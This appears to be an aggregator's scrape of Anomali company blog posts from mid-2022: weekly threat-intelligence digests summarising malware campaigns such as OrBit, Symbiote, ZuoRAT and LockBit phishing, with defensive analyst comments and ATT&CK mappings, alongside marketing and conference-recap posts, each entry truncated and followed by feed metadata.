Exploitation for Client Execution - T1203 Tags: China, source-country:CN, Russia, target-country:RU, Ukraine, Pakistan, target-country:PK, Bisonal RAT, Tonto Team, APT, CactusPete, Earth Akhlut, Royal Road, 8.t builder, CVE-2018-0798 OrBit: New Undetected Linux Threat Uses Unique Hijack of Execution Flow (published: July 6, 2022) Intezer researchers describe a new Linux malware dubbed OrBit, that was fully undetected at the time of the discovery. This malware hooks functions and adds itself to all running processes, but it doesn’t use LD_PRELOAD as previously described Linux threats. Instead it achieves persistence by adding the path to the malware into the /etc/ld.so.preload and by patching the binary of the loader itself so it will load the malicious shared object. OrBit establishes an SSH connection, then stages and infiltrates stolen credentials. It avoids detection by multiple functions that show running processes or network connections, as it hooks these functions and filters their output. Analyst Comment: Defenders are advised to use network telemetry to detect anomalous SSH traffic associated with OrBit exfiltration attempts. Consider network segmentation, storing sensitive data offline, and deploying security solutions as statically linked executables. MITRE ATT&CK: [MITRE ATT&CK] Hijack Execution Flow - T1574 | [MITRE ATT&CK] Hide Artifacts - T1564 | ]]> 2022-07-11T22:59:00+00:00 https://www.anomali.com/blog/anomali-cyber-watch-brute-ratel-c4-framework-abused-to-avoid-detection-orbit-kernel-malware-patches-linux-loader-hive-ransomware-gets-rewritten-and-more www.secnews.physaphae.fr/article.php?IdArticle=5664956 False Ransomware,Malware,Tool,Vulnerability,Threat,Patching APT 29 None Anomali - Firm Blog Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed. Trending Cyber News and Threat Intelligence Toll Fraud Malware: How an Android Application Can Drain Your Wallet (published: June 30, 2022) Toll fraud malware (subcategory of billing fraud) subscribes users to premium services without their knowledge or consent. It is one of the most prevalent types of Android malware, accounting for 35% of installed harmful applications from the Google Play Store in the first quarter of 2022. Microsoft researchers describe evolution of the toll fraud malware techniques used to abuse the Wireless Application Protocol (WAP) billing. Toll malware can intercept one-time passwords (OTPs) over multiple protocols (HTTP, SMS, or USSD). It suppresses notifications and uses dynamic code loading to hide its malicious activities. Analyst Comment: Mobile applications should only be downloaded from official trusted locations such as the Google Play Store. Users should be mindful when granting unusual, powerful permissions such as SMS permissions, notification listener access, or accessibility access. Replace older Android phones if they no longer receive updates. MITRE ATT&CK: [MITRE ATT&CK] User Execution - T1204 Tags: Toll fraud, Android, Billing fraud, Wireless Application Protocol, WAP billing ZuoRAT Hijacks SOHO Routers To Silently Stalk Networks (published: June 28, 2022) Black Lotus Labs discovered a China-sponsored, years-long campaign that exploits small office/home office (SOHO) routers for initial access. When exploiting Ruckus JCG-Q20 routers in Hong Kong, the attackers leveraged CVE-2020-26878 and CVE-2020-26879 vulnerabilities. Other exploits are yet to be uncovered with the most targeted devices being from ASUS, Cisco, DrayTek and NETGEAR mostly in Canada, the UK, and the US. The attackers were installing a heavily modified version of Mirai botnet dubbed ZuoRAT. ZuoRAT collects information on target networks, collects traffic (credentials passed in the clear, browsing activity) and hijacks network communication. Then the attackers move laterally targeting Windows and other machines on the same network and installing one of the three agents: Cobalt Strike, CBeacon, or GoBeacon. Analyst Comment: SOHO router users should regularly reboot routers and install security updates. Businesses should ensure robust detection on network-based communications. MITRE ATT&CK: [MITRE ATT&CK] Exploit Public-Facing Application - T1190 | [MITRE ATT&CK] Ingress Tool Transfer - T1105 | [MITRE ATT&CK] Proxy - T1090 | [MITRE ATT&CK] Application Layer Protocol - T1071 | [MITRE ATT&CK] Component Object Model Hijacking - T1122]]> 2022-07-06T15:01:00+00:00 https://www.anomali.com/blog/anomali-cyber-watch-russian-killnet-ddosed-lithuania-building-automation-systems-targeted-to-install-shadowpad-china-sponsored-group-jumps-from-home-routers-to-connected-machines-and-more www.secnews.physaphae.fr/article.php?IdArticle=5579532 False Malware,Tool,Vulnerability,Threat None None Anomali - Firm Blog Cybersecurity Insights Report 2022: The State of Cyber Resilience. Coming in at number two on our list: Dealing with the speed and complexity of digital transformation. During the COVID-19 crisis, digital transformation became even more critical. To describe digital transformation in economic terms means integrating digital technologies into every aspect of a business, resulting in fundamental changes to how companies operate and provide value to their customers. Technology has changed from supporting business processes to becoming integral to a company’s customer value proposition. A study by McKinsey found that companies accelerated their digital transformation efforts by three to seven years within just months, fearing that they would lose their competitive advantage and be left behind by competitors already ahead. Organizations need to rethink what they mean when saying “digital transformation.” It’s not just about making your website responsive, adding digital capabilities, or creating a mobile app for your business. It’s about changing your mindset when thinking about your customers, empowering your staff, and powering business. And ensuring your security program can adapt to that mindset to ensure the security of your enterprise. Digital Transformation Increases Cyber Risk   Security teams continue to face unique challenges daily. Their organization’s digital transformation initiatives continue to increase the complexity, expanding their attack surface with a distributed infrastructure. Because of this, cybersecurity postures should be updated and adjusted to support transformation goals to defend against this new level of complexity. In addition to the ever-changing threat landscape, security teams face more concerns due to a more distributed workforce. They also need to evaluate the risks associated with a growing number of connected devices and the disappearing perimeter. The increased adoption of cloud infrastructures also poses unique challenges to organizations, forcing them to transform their security posture to protect against cloud infrastructure vulnerabilities. Securing a Remote Work Force Remote work is here to stay and will only increase. Global Workplace Analytics calculates that 22% of the workforce (i.e., 36.2 million Americans) will work remotely by 2025. The significant uptick in remote work setups and digital business is pushing organizations to apply for secure access no matter where their users, applications, or devices are located. To provide the level of security necessary to protect the variety of new systems implemented, many enterprises are shifting to more cloud-friendly and behavior-based security approaches.  New Challenges and Security Vulnerabilities As mentioned above, studies show that a large portion of those working from home will likely stay that way for the long term. Corporate leaders attempting to coax employees back to the office have broadly accepted the inevitability of the hybrid work model. To ensure their defensive measures remain in place and to maintain business as usual safely, it’s critical for IT teams to develop strategic plans to safeguard employees, facilities, data,]]> 2022-06-30T10:00:00+00:00 https://www.anomali.com/blog/dealing-with-the-cybersecurity-challenges-of-digital-transformation www.secnews.physaphae.fr/article.php?IdArticle=5468174 False Tool,Threat,Studies,Guideline None None Anomali - Firm Blog Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed. Trending Cyber News and Threat Intelligence Lockbit Ransomware Disguised as Copyright Claim E-mail Being Distributed (published: June 24, 2022) ASEC researchers have released their analysis of a recent phishing campaign, active since February 2022. The campaign aims to infect users with Lockbit ransomware, using the pretense of a copyright claim as the phishing lure. The phishing email directs the recipient to open the attached zip file which contains a pdf of the infringed material. In reality, the pdf is a disguised NSIS executable which downloads and installs Lockbit. The ransomware is installed onto the desktop for persistence through desktop change or reboot. Prior to data encryption, Lockbit will delete the volume shadow copy to prevent data recovery, in addition to terminating a variety of services and processes to avoid detection. Analyst Comment: Never click on suspicious attachments or run any executables from suspicious emails. Copyright infringement emails are a common phishing lure. Such emails will be straight forward to rectify if legitimate. If a copyright email is attempting to coerce you into opening attachments, such emails should be treated with extreme caution. MITRE ATT&CK: [MITRE ATT&CK] Phishing - T1566 | [MITRE ATT&CK] Data Encrypted for Impact - T1486 | [MITRE ATT&CK] Impair Defenses - T1562 Tags: malware:Phishing, malware:Lockbit, Lockbit, Copyright, Ransomware There is More Than One Way To Sleep: Deep Dive into the Implementations of API Hammering by Various Malware Families (published: June 24, 2022) Researchers at Palo Alto Networks have released their analysis of new BazarLoader and Zloader samples that utilize API Hammering as a technique to evade sandbox detection. API Hammering makes use of a large volume of Windows API calls to delay the execution of malicious activity to trick sandboxes into thinking the malware is benign. Whilst BazarLoader has utilized the technique in the past, this new variant creates large loops of benign API using a new process. Encoded registry keys within the malware are used for the calls and the large loop count is created from the offset of the first null byte of the first file in System32 directory. Zloader uses a different form of API Hammering to evade sandbox detection. Hardcoded within Zloader are four large functions with many smaller functions within. Each function makes an input/output (I/O) call to mimic the behavior of many legitimate processes. Analyst Comment: Defense in depth is the best defense against sophisticated malware. The Anomali Platform can assist in detection of malware and Match anomalous activity from all telemetry sources to provide the complete picture of adversary activity within your network. MITRE ATT&CK: [MITRE ATT&CK] Virtualization/Sandbox Evasion - T1497 Tags: malware:BazarLoad]]> 2022-06-28T19:11:00+00:00 https://www.anomali.com/blog/anomali-cyber-watch-api-hammering-confuses-sandboxes-pirate-panda-wrote-in-nim-magecart-obfuscates-variable-names-and-more www.secnews.physaphae.fr/article.php?IdArticle=5436667 False Ransomware,Spam,Malware,Tool,Vulnerability,Threat APT 23,APT 28 None Anomali - Firm Blog AWS Partner Network blog. By Ranjith Raman, Sr. Partner Solutions Architect – AWS By Oded Rosenmann, Global Practice Lead, SaaS Partners – AWS Organizations are increasingly looking for new ways to defend themselves against cyber threats, fraud, and ransomware attacks. Many enterprises and government agencies turn to cyber security solutions that provide efficient and effective detection and response capabilities to proactively prevent attackers from breaching their networks and applications. To help organizations overcome these challenges, Anomali, a leader in intelligence-driven cybersecurity solutions, has recently launched its Cloud-Native extended detection and response (XDR) solution, The Anomali Platform. Building upon its leadership position in the cyber threat intelligence space,  The Anomali Platform provides customers with a new dimension of security visibility across all log telemetry from endpoints to the cloud. The Anomali Platform provides precision detection and optimized response capabilities that extends across their entire security infrastructure.   With the support of AWS SaaS Factory, Anomali has built the Anomali Cloud-Native XDR offering as a software-as-a-services (SaaS) solution that helps improve organizational efficiencies, providing security teams with the tools and insights needed to detect relevant threats, make informed decisions, and respond effectively.      “The AWS SaaS Factory team was instrumental in helping us identify appropriate service options aligned with our enterprise customer requirements. Working with the team, we saved months of engineering efforts to build a powerful platform that meets our current needs and allows us to scale.” Mark Alba, Chief Product Officer, Anomali Mark Alba, Chief Product Officer, Anomali The cloud-native XDR solution is fueled by big data management, machine learning, and the world’s largest repository of global intelligence. With the new SaaS model, The Anomali Platform can be easily integrated with existing security infrastructures, enabling CIOs, CISOs, and other business leaders to optimize their overall security investments and create more efficient and effective detection and response programs that proactively address advanced cyber threats. The SaaS Factory team spoke with Mark Alba, Chief Product Officer at Anomali, to learn more about Anomali Cloud-Native XDR SaaS, the value its new solution brings to customers, and the key lessons learned from the journey to SaaS on AWS. Check out the new Anomali Cloud-Native XDR SaaS solution >>   Q&A with Anomali AWS SaaS Factory: Mark, thank you for taking the time to speak with us today. Could you share a bit about your background and role at Anomali? Mark Alba:       My name is Mark Alba, and I’m the Chief Product Officer at Anomali. I’ve been with Anomali since April 2020 and am responsible for product management, user experience, threat research, and technology incubator functions.  My background includes over 20 years of experience building, managing, and marketing disruptive products and services. I brought to market the security industry’s first fully-integrated applian]]> 2022-06-23T12:00:00+00:00 https://www.anomali.com/blog/anomali-launches-differentiated-cloud-native-xdr-saas-solution-with-support-from-aws-saas-factory www.secnews.physaphae.fr/article.php?IdArticle=5341120 False Ransomware,Tool,Threat,Guideline None None Anomali - Firm Blog our previous post on cyber threats, organizations must find new and novel defenses against adversaries who increasingly shift tactics. As adversaries become more nuanced, we must understand their moves and motivations to try to get one step ahead of them.  Let’s Recap:  Several high-profile security incidents in the recent past altogether grimly encapsulate the myriad challenges companies now face. NotPetya, the most expensive cyber incident in history, demonstrated how attackers are masquerading their efforts. NotPetya targeted a tax software company in Ukraine in 2017. At first, the effort appeared to be ransomware. However, its intent was purely destructive as it was designed to inflict damage as quickly and effectively as possible.    The C Cleaner attack, a few months later, demonstrated how complex and patient actors who were focused on IP level threats had become. The targets were system administrative tools that, if compromised, already had an increased level of access. C Cleaner showed that all software supply chain attacks aren’t created equal. It’s dependent on the level of access of the systems and the users that you’re compromising. Some 3 million versions of the compromised C Cleaner software were downloaded. However, only 50 of the downloaded software received additional payloads. This was an adversary that was willing to compromise more than 3 million systems to just get a foothold into 50. This gives you a clear idea of the challenges that we face as enterprises from these types of sophisticated actors. Attackers are also being more flagrant and doing a better job of covering their tracks. In the past, nation states focused on covert activities. Olympic Destroyer, which targeted the 2018 Olympics in South Korea, showed how attacks are now being brought to the public eye. False flags, tactics applied to deceive or misguide attribution attempts, were also put into Olympic Destroyer. Six months after the attack, it was attributed to multiple different nations, because such care had been put into throwing off attribution. More recently, VPN Filter/Cyber Blink demonstrated how adversaries are targeting different types of equipment. While attacks have historically focused on office equipment, these incidents shifted to home routers, in tandem with the increase in remote work. At home, people often use combination modem routers. These devices challenge detection capabilities. A foothold into home routers also allows actors to analyze all traffic moving in and out of the network. It’s incredibly difficult to detect an attack. You have to treat a home Wi-Fi like a public Wi-Fi at a coffee shop. Threat actors are targeting the foundational infrastructure of the internet as well. Sea T]]> 2022-06-22T13:00:00+00:00 https://www.anomali.com/blog/rsa-2022-cyber-attacks-continue-to-come-in-ever-shifting-waves www.secnews.physaphae.fr/article.php?IdArticle=5325562 False Malware,Tool,Threat NotPetya,NotPetya None Anomali - Firm Blog Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed. Trending Cyber News and Threat Intelligence Update: The Phish Goes On - 5 Million Stolen Credentials and Counting (published: June 16, 2022) PIXM researchers describe an ongoing, large-scale Facebook phishing campaign. Its primary targets are Facebook Messenger mobile users and an estimated five million users lost their login credentials. The campaign evades Facebook anti-phishing protection by redirecting to a new page at a legitimate service such as amaze.co, famous.co, funnel-preview.com, or glitch.me. In June 2022, the campaign also employed the tactic of displaying legitimate shopping cart content at the final page for about two seconds before displaying the phishing content. The campaign is attributed to Colombian actor BenderCrack (Hackerasueldo) who monetizes displaying affiliate ads. Analyst Comment: Users should check what domain is asking for login credentials before providing those. Organizations can consider monitoring their employees using Facebook as a Single Sign-On (SSO) Provider. MITRE ATT&CK: [MITRE ATT&CK] Phishing - T1566 | [MITRE ATT&CK] User Execution - T1204 Tags: Facebook, Phishing, Facebook Messenger, Social networks, Mobile, Android, iOS, Redirect, Colombia, source-country:CO, BenderCrack, Hackerasueldo F5 Labs Investigates MaliBot (published: June 15, 2022) F5 Labs researchers describe a novel Android trojan, dubbed MaliBot. Based on re-written SOVA malware code, MaliBot is maintaining its Background Service by setting itself as a launcher. Its code has some unused evasion portions for emulation environment detection and setting the malware as a hidden app. MaliBot spreads via smishing, takes control of the device and monetizes using overlays for certain Italian and Spanish banks, stealing cryptocurrency, and sometimes sending Premium SMS to paid services. Analyst Comment: Users should be wary of following links in unexpected SMS messages. Try to avoid downloading apps from third-party websites. Be cautious with enabling accessibility options. MITRE ATT&CK: [MITRE ATT&CK] System Network Configuration Discovery - T1016 | [MITRE ATT&CK] User Execution - T1204 Tags: MaliBot, Android, MFA bypass, SMS theft, Premium SMS, Smishing, Binance, Trust wallet, VNC, SOVA, Sality, Cryptocurrency, Financial, Italy, target-country:IT, Spain, target-country:ES Extortion Gang Ransoms Shoprite, Largest Supermarket Chain in Africa (published: June 15, 2022) On June 10, 2022, the African largest supermarket chain operating in twelve countries, Shoprite Holdings, announced a possible cybersecurity incident. The company notified customers in E]]> 2022-06-21T15:03:00+00:00 https://www.anomali.com/blog/anomali-cyber-watch-gallium-expands-targeting-across-telecommunications-government-and-finance-sectors-with-new-pingpull-tool-dragonforce-malaysia-opspatuk-opsindia-and-more www.secnews.physaphae.fr/article.php?IdArticle=5309464 False Ransomware,Malware,Tool,Vulnerability,Threat,Guideline,Conference APT 35,Yahoo None Anomali - Firm Blog Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed. Trending Cyber News and Threat Intelligence Symbiote Deep-Dive: Analysis of a New, Nearly-Impossible-to-Detect Linux Threat (published: June 9, 2022) Intezer and BlackBerry researchers described a new, previously unknown malware family dubbed Symbiote. It is a very stealthy Linux backdoor and credential stealer that has been targeting financial and other sectors in Brazil since November 2021. Symbiote is a shared object (SO) library that is loaded into all running processes using LD_PRELOAD before any other SOs. It uses hardcoded lists to hide associated processes and files, and affects the way ldd displays lists of SOs to remove itself from it. Additionally, Symbiote uses three methods to hide its network traffic. For TCP, Symbiote hides traffic related to some high-numbered ports and/or certain IP addresses using two techniques: (1) hooking fopen and fopen64 and passing a scribbed file content for /proc/net/tcp that lists current TCP sockets, and (2) hooking extended Berkeley Packet Filter (eBPF) code to hide certain network traffic from packet capture tools. For UDP, Symbiote hooks two libpcap functions filtering out packets containing certain domains and fixing the packet count. All these evasion measures can lead to Symbiote being hidden during a live forensic investigation. Analyst Comment: Defenders are advised to use network telemetry to detect anomalous DNS requests associated with Symbiote exfiltration attempts. Security solutions could be deployed as statically linked executables so they don’t expose themselves to this kind of compromise by calling for additional libraries. MITRE ATT&CK: [MITRE ATT&CK] Hijack Execution Flow - T1574 | [MITRE ATT&CK] Hide Artifacts - T1564 | [MITRE ATT&CK] Exfiltration Over Alternative Protocol - T1048 | [MITRE ATT&CK] Data Staged - T1074 Tags: Symbiote, target-region:Latin America, Brazil, target-country:BR, Financial, Linux, Berkeley Packet Filter, eBPF, LD_PRELOAD, Exfiltration over DNS, dnscat2 Alert (AA22-158A). People’s Republic of China State-Sponsored Cyber Actors Exploit Network Providers and Devices (published: June 8, 2022) Several US federal agencies issued a special Cybersecurity Advisory regarding China-sponsored activities concentrating on two aspects: compromise of unpatched network devices and threats to IT and telecom. Attackers compromise unpatched network devices, such as Small Office/Home Office (SOHO) routers and Network Attached Storage (NAS) devices, to serve as “hop points” to obfuscate their China-based IP addresses in preparation and during the next intrusion. Similarly, routers in IT and Telecom companies are targeted for initial access by China-sponsored groups, this time using open-source router specific software frameworks, RouterSploit and RouterScan. Analyst Comment: When planning your company]]> 2022-06-14T15:15:00+00:00 https://www.anomali.com/blog/anomali-cyber-watch-symbiote-linux-backdoor-is-hard-to-detect-aoqin-dragon-comes-through-fake-removable-devices-china-sponsored-groups-proxy-through-compromised-routers-and-more www.secnews.physaphae.fr/article.php?IdArticle=5145972 False Ransomware,Malware,Tool,Vulnerability,Threat,Guideline CCleaner None Anomali - Firm Blog Malware Intelligence - Remote Access Tools and Trojans Pulls OSINT and primary intelligence feeds related to remote access tool and trojan samples, actors who use these tools and trojans, and TTPs associated with known remote access tool and trojan families, among others, and displays the data in 10 widgets. ]]> 2022-06-13T16:46:00+00:00 https://www.anomali.com/blog/malware-intelligence-dashboards www.secnews.physaphae.fr/article.php?IdArticle=5133965 False Ransomware,Malware,Tool,Threat None None Anomali - Firm Blog first three months on the job, sharing the particular challenges they faced while building out their organizations’ strategies, policies and procedures. Any new CISO will need access to the best and most actionable intelligence possible about the shifting threats to their organizations. They’re walking into new situations where they’ll immediately be under the gun to translate all the data that they’re keeping tabs on into real business impact. All the while, they’ll be expected to report to their bosses in the C-suite both on the organization’s risks and security exposure as well as what they’re doing to stay ahead of the bad guys. Clearly, enterprises are going to need an updated approach to put them in a stronger position when it comes to threat detection and response. That doesn’t happen nearly enough, according to panelist Olivia Rose, the CISO of Amplitude. She noted that many new CISOs don’t listen carefully enough when they take over and risk ostracizing the people actually doing the work. Instead, she said the CISO’s first 30 days should be akin to a listening tour. The immediate goal is to build allies for any rethink of the organization's security posture. The longer-term goal is to implement the necessary tools and processes that will make it easier for the enterprise to stay on top of security threats. For example, one of the first things that another panelist, Caleb Sima, the CISO of Robinhood, did when he took over was to conduct an internal survey to measure the relationship between security and the rest of the organization. That was the jumping-off point for follow-up conversations with other departments about what they needed and how to improve the security relationship. After consulting with the engineering leadership and other stakeholders, he then built out planning decks with progress goals for his first year in preparation for a presentation of his findings to the executive team. It’s worth noting that this degree of sharing doesn’t need to be limited to the walls of an organization. Building on the advice outlined by Sima, new methods and tools are emerging to enable sharing within intelligence communities and among organizations that historically would have avoided sharing information for fear of spilling trade secrets. The Anomali platform, for example, makes threat intelligence sharing possible between ISACs, ISAOs, industry groups and other communities looking to share intelligence in a secure and trusted way. Winning Over the Board Perhaps no relationship – particularly during those first 90 days – is as critical as the one between the new CISO and the company’s board of directors. In the past, truth be told, the relationship left much to be desired. But in more recent years, more boards have recognized the strategic value of security and the monetary and reputational risks of data breaches. For new CISOs, it’s more important to articulate the nature of the gathering threats, real and potential, and the company’s defense capabilities – in plain English. That means keeping insights and implications very clear, with an emphasis on impact. Going even further, the CISO at some point early in their tenure will need to report progress t]]> 2022-06-09T02:40:00+00:00 https://www.anomali.com/blog/rsa-2022-youre-the-new-ciso-want-to-fix-the-problem-start-by-simply-listening www.secnews.physaphae.fr/article.php?IdArticle=5058766 False Tool,Threat,Guideline None None Anomali - Firm Blog Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed. Trending Cyber News and Threat Intelligence WinDealer Dealing on the Side (published: June 2, 2022) Kaspersky researchers detected a man-on-the-side attack used by China-sponsored threat group LuoYu. Man-on-the-side is similar to man-in-the-middle (MitM) attack; the attacker has regular access to the communication channel. In these attacks LuoYu were using a potent modular malware dubbed WinDealer that can serve as a backdoor, downloader, and infostealer. The URL that distributes WinDealer is benign, but on rare conditions serves the malware. One WinDealer sample was able to use a random IP from 48,000 IP addresses of two Chinese IP ranges. Another WinDealer sample was programmed to interact with a non-existent domain name, www[.]microsoftcom. Analyst Comment: Man-on-the-side attacks are hard to detect. Defense would require a constant use of a VPN to avoid networks that the attacker has access to. A defense-in-depth (layering of security mechanisms, redundancy, fail-safe defense processes) approach is a good mitigation step to help prevent actors from advanced threat groups. MITRE ATT&CK: [MITRE ATT&CK] Man-in-the-Middle - T1557 | [MITRE ATT&CK] Obfuscated Files or Information - T1027 | [MITRE ATT&CK] Deobfuscate/Decode Files or Information - T1140 | [MITRE ATT&CK] Ingress Tool Transfer - T1105 | [MITRE ATT&CK] File and Directory Discovery - T1083 | [MITRE ATT&CK] Modify Registry - T1112 | [MITRE ATT&CK] Screen Capture - T1113 | [MITRE ATT&CK] Process Discovery - T1057 Tags: Man-on-the-side attack, WinDealer, LuoYu, SpyDealer, Demsty, Man-in-the-middle, APT, EU, target-region:EU, North America, Russia, China, source-country:CN, target-country:CN, Germany, target-country:DE, Austria, target-country:AT, USA, target-country:US, Czech Republic, target-country:CZ, Russia, target-country:RU, India, target-country:IN. Analysis of the Massive NDSW/NDSX Malware Campaign (published: June 2, 2022) Sucuri researchers describe the NDSW/NDSX (Parrot TDS) malware campaign that compromises websites to distribute other malware via fake update notifications. Currently one of the top threats involving compromised websites, NDSW/NDSX began operation in or before February 2019. This campaign utilizes various exploits including those based on newly-disclosed and zero-day vulnerabilities. After the compromise, the NDSW JavaScript is injected often followed by the PHP proxy script that loads the payload on the server side to hide the malware staging server. Next step involves the NDSX script downloading ]]> 2022-06-07T17:41:00+00:00 https://www.anomali.com/blog/anomali-cyber-watch-man-on-the-side-attack-affects-48000-ip-addresses-iran-outsources-cyberespionage-to-lebanon-xloader-complex-randomization-to-contact-mostly-fake-c2-domains-and-more www.secnews.physaphae.fr/article.php?IdArticle=5024723 False Malware,Tool,Vulnerability,Threat None None Anomali - Firm Blog Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed. Trending Cyber News and Threat Intelligence Credit Card Stealer Targets PsiGate Payment Gateway Software (published: May 25, 2022) Sucuri Researchers have detailed their findings on a MageCart skimmer that had been discovered within the Magento payment portal. Embedded within the core_config_data table of Magento’s database, the skimmer was obfuscated and encoded with CharCode. Once deobfuscated, a JavaScript credit card stealer was revealed. The stealer is able to acquire text and fields that are submitted to the payment page, including credit card numbers and expiry dates. Once stolen, a synchronous AJAX is used to exfiltrate the data. Analyst Comment: Harden endpoint security and utilize firewalls to block suspicious activity to help mitigate against skimmer injection. Monitor network traffic to identify anomalous behavior that may indicate C2 activity. MITRE ATT&CK: [MITRE ATT&CK] Exfiltration Over C2 Channel - T1041 | [MITRE ATT&CK] Data Encoding - T1132 | [MITRE ATT&CK] Input Capture - T1056 Tags: MageCart, skimmer, JavaScript Magento, PsiGate, AJAX How the Saitama Backdoor uses DNS Tunneling (published: May 25, 2022) MalwareBytes Researchers have released their report detailing the process behind which the Saitama backdoor utilizes DNS tunneling to stealthy communicate with command and control (C2) infrastructure. DNS tunneling is an effective way to hide C2 communication as DNS traffic serves a vital function in modern day internet communications thus blocking DNS traffic is almost never done. Saitama formats its DNS lookups with the structure of a domain consisting of message, counter . root domain. Data is encoded utilizing a hardcoded base36 alphabet. There are four types of messages that Saitama can send using this method: Make Contact to establish communication with a C2 domain, Ask For Command to get the expected size of the payload to be delivered, Get A Command in which Saitama will make Receive requests to retrieve payloads and instructions and finally Run The Command in which Saitama runs the instructions or executes the payload and sends the results to the established C2. Analyst Comment: Implement an effective DNS filtering system to block malicious queries. Furthermore, maintaining a whitelist of allowed applications for installation will assist in preventing malware like Saitama from being installed. MITRE ATT&CK: [MITRE ATT&CK] Data Encoding - T1132 | [MITRE ATT&CK] Exfiltration Over C2 Channel - T1041 Tags: C2, DNS, Saitama, backdoor, base36, DNS tunneling ]]> 2022-06-01T17:47:00+00:00 https://www.anomali.com/blog/anomali-cyber-watch-turlas-new-phishing-based-reconnaissance-campaign-in-eastern-europe-unknown-apt-group-has-targeted-russia-repeatedly-since-ukraine-invasion-and-more www.secnews.physaphae.fr/article.php?IdArticle=4921519 False Ransomware,Malware,Tool,Threat APT 19 None Anomali - Firm Blog Cybersecurity Insights Report 2022: The State of Cyber Resilience. Coming in at number three on our list: Identifying and Utilizing the Latest Cybersecurity Solutions This is not surprising, as just under half of security decision-makers strongly agree that their cybersecurity teams can quickly prioritize threats based on trends, severity, and potential impact. Cybersecurity Analysts use various tools in their jobs, which can be organized into a few categories: network security monitoring, encryption, web vulnerability, penetration testing, antivirus software, network intrusion detection, and packet sniffers. Types of Tools Network security monitoring tools These tools are used to analyze network data and detect network-based threats.  Encryption tools Encryption protects data by scrambling text so that it is unreadable to unauthorized users.  Web vulnerability scanning tools These software programs scan web applications to identify security vulnerabilities, including cross-site scripting, SQL injection, and path traversal.  Penetration testing Penetration testing, also known as “pen test”, simulates an attack on a computer system to evaluate the security of that system.  Antivirus software This software is designed to find viruses and harmful malware, including ransomware, worms, spyware, adware, and Trojans. Network intrusion detection An Intrusion Detection System (IDS) monitors network and system traffic for unusual or suspicious activity and notifies the administrator if a potential threat is detected.  Packet sniffers A packet sniffer, also called a packet analyzer, protocol analyzer or network analyzer, is used to intercept, log, and analyze network traffic and data.  Firewall tools Monitor incoming and outgoing network traffic and permit or block data packets based on security rules. Detection and Response Platforms Detection and response services analyze and proactively detect and eventually eliminate cyber threats. Alerts are investigated to determine if any action is required. As I pointed out in a previous blog, enterprise organizations have deployed over 130 security tools. Here's a look at the current technology security teams use or plan to invest in. What's even crazier is this stat: CyberDB claims to have more than 3,500 cybersecurity vendors listed in the United States alone. So, how are security professionals supposed to keep up with the latest trends or innovations in technology? Thankfully, we live in the digital age where information is just a click away. I typically start my day by reading news websites and blogs from security experts and check the twitter. You can also attend webinars and conferences or communicate directly with someone well-versed in the field. Get Social Social media networks are excellent sources for finding new content. (Shameless plug, make sure you're following us on LinkedIn and Twitter) Twitter is particularly useful if you know what hashtags to search for or who to follow. You can see discussions in real-time to get yourself into the conversation; create feed lists to weed out the noise by specifying what security vendors, influencers, and developers you]]> 2022-05-26T10:42:00+00:00 https://www.anomali.com/blog/understanding-the-latest-cybersecurity-solutions-to-keep-up-with-todays-threats www.secnews.physaphae.fr/article.php?IdArticle=4819998 False Tool,Vulnerability,Threat None 5.0000000000000000 Anomali - Firm Blog Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed. Trending Cyber News and Threat Intelligence VMware Vulnerabilities Exploited in the Wild (CVE-2022-22954 and Others) (published: May 20, 2022) In April 2022, VMware publicly revealed several vulnerabilities affecting its products, and by May 2022 Cybersecurity and Infrastructure Security Agency (CISA) issued an emergency directive to mitigate two of the VMware vulnerabilities (CVE-2022-22954 and CVE-2022-22960). CVE-2022-22954 is a remote code execution (RCE) vulnerability using server-side template injection to target VMware Workspace ONE Access and Identity Manager. It can be easily exploited with a single HTTP request to a vulnerable device and was seen delivering various payloads including coinminers, Perl Shellbots, Scanning/Callbacks, and Webshells. CVE-2022-22954 is also being exploited to drop variants of the Mirai/Gafgyt, and in the case of the observed Enemybot variant, final payloads themselves embed CVE-2022-22954 exploits for further exploitation and propagation. Analyst Comment: Update impacted VMware products to the latest version or remove impacted versions from organizational networks. If a compromise is detected, immediately isolate affected systems, collect relevant logs and artifacts, and consider incident response services. MITRE ATT&CK: [MITRE ATT&CK] Exploit Public-Facing Application - T1190 | [MITRE ATT&CK] Ingress Tool Transfer - T1105 | [MITRE ATT&CK] Command and Scripting Interpreter - T1059 | [MITRE ATT&CK] Account Manipulation - T1098 | [MITRE ATT&CK] Obfuscated Files or Information - T1027 | [MITRE ATT&CK] Deobfuscate/Decode Files or Information - T1140 | [MITRE ATT&CK] Resource Hijacking - T1496 | [MITRE ATT&CK] Network Denial of Service - T1498 Tags: VMware, Perl Shellbot, Stealth Shellbot, Godzilla Webshell, Gafgyt, Mirai, XMRig, Coinminer, CVE-2022-22958, CVE-2022-22959, CVE-2022-22960, CVE-2017-17215, CVE-2022-22961, CVE-2022-22954, CVE-2022-22955, CVE-2022-22956, CVE-2022-22957, CVE-2022-22973, CVE-2022-22972, Linux, Server-side template injection, RCE DisCONTInued: The End of Conti’s Brand Marks New Chapter For Cybercrime Landscape (published: May 20, 2022) Advanced Intel researchers report that Conti ransomware group (Wizard Spider) is in the long-planned process of discontinuing its brand and has turned off its infrastructure including their negotiations service site and the admin panel of the Conti official website. The attack on Costa Rica was intentionally causing publicity ]]> 2022-05-24T17:29:00+00:00 https://www.anomali.com/blog/anomali-cyber-watch-contis-talent-goes-to-other-ransom-groups-china-based-espionage-targets-russia-xorddos-stealthy-linux-trojan-is-on-the-rise-and-more www.secnews.physaphae.fr/article.php?IdArticle=4788392 False Ransomware,Malware,Tool,Vulnerability,Threat None None Anomali - Firm Blog Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed. Trending Cyber News and Threat Intelligence COBALT MIRAGE Conducts Ransomware Operations in U.S. (published: May 12, 2022) Secureworks researchers describe campaigns by Iran-sponsored group Cobalt Mirage. These actors are likely part of a larger group, Charming Kitten (Phosphorus, APT35, Cobalt Illusion). In 2022, 